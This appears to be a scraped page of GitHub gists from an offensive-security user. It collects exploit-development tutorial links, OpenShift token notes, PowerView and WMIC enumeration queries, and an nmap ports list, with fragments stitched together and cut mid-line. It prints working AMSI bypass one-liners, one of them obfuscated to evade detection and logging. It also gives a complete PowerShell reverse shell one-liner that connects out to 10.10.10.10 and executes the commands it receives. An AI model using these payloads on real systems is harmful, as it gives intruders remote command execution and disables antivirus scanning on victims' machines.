
http://whitelist1.com/
https://ocw.cs.pub.ro/courses/cns/labs/start
https://windowsexploit.com/blog
https://www.securitysift.com/windows-exploit-development-part-1-basics/
http://6.www.shogunlab.com/blog/2017/08/19/zdzg-windows-exploit-1.html
http://corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/
https://tuts4you.com/e107_plugins/download/download.php?list.17=
https://learnxinyminutes.com/docs/c/
http://www.thegreycorner.com/
http://www.dmi.unipg.it/bista/didattica/sicurezza-pg/buffer-overrun/hacking-book/0x2a0-writing_shellcode.html
@podjackel
podjackel / OpenShift-Notes.md
Last active September 7, 2021 19:51
OpenShift Notes

Getting access

  • Use the Openshift Client to connect to instances
    • oc login -u $USERNAME -p $PASSWORD
  • Can also use the REST API
    • Needs a bearer token: log in with oc login, then run oc whoami -t to get the token
TOKEN=`oc whoami -t`
curl --insecure -H "Authorization: Bearer $TOKEN" https://$TARGET:8443/oapi/v1
@podjackel
podjackel / PowerView-3.0-tricks.ps1
Created August 20, 2021 17:03 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@podjackel
podjackel / wmic_cmds.txt
Created August 18, 2021 17:28 — forked from xorrior/wmic_cmds.txt
Useful Wmic queries for host and domain enumeration
Host Enumeration:
--- OS Specifics ---
wmic os LIST Full (* To obtain the OS Name, use the "caption" property)
wmic computersystem LIST full
--- Anti-Virus ---
wmic /namespace:\\root\securitycenter2 path antivirusproduct
# My original AMSI bypass - does not attempt to bypass WMF autologging
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Modified AMSI bypass that also bypasses WMF5 autologging.
# This was reported to MS. CreateDelegate simply needs to be added to the "suspicious" signature list.
[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.Bindin'+'gFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType('System.T'+'ype')), [Object]([Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')),('GetFie'+'ld')).Invoke('amsiInitFailed',(('Non'+'Public,Static') -as [String].Assembly.GetType('System.Reflection.Bindin'+'gFlags'))).SetValue($null,$True)
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - */
/* AES implementation in JavaScript (c) Chris Veness 2005-2011 */
/* - see http://csrc.nist.gov/publications/PubsFIPS.html#197 */
/* - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - */
var Aes = {}; // Aes namespace
/**
* AES Cipher function: encrypt 'input' state with Rijndael algorithm
* applies Nr rounds (10/12/14) using key schedule w for 'add round key' stage
@podjackel
podjackel / powershell_reverse_shell.ps1
Last active September 17, 2022 16:29 — forked from ThunderSon/powershell_reverse_shell.ps1
powershell reverse shell one-liner (no attribution)
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
# $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);
# $stream = $client.GetStream();
# [byte[]]$bytes = 0..65535|%{0};
# while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;
# $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
# $sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";
# $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
# $stream.Write($sendbyte,0,

nmap --top-ports <#ports> -v -oG - localhost

Top 100:

7,9,13,21-23,25-26,37,53,79-81,88,106,110-111,113,119,135,139,143-144,179,199,389,427,443-445,465,513-515,543-544,548,554,587,631,646,873,990,993,995,1025-1029,1110,1433,1720,1723,1755,1900,2000-2001,2049,2121,2717,3000,3128,3306,3389,3986,4899,5000,5009,5051,5060,5101,5190,5357,5432,5631,5666,5800,5900,6000-6001,6646,7070,8000,8008-8009,8080-8081,8443,8888,9100,9999-10000,32768,49152-49157

Top 1000: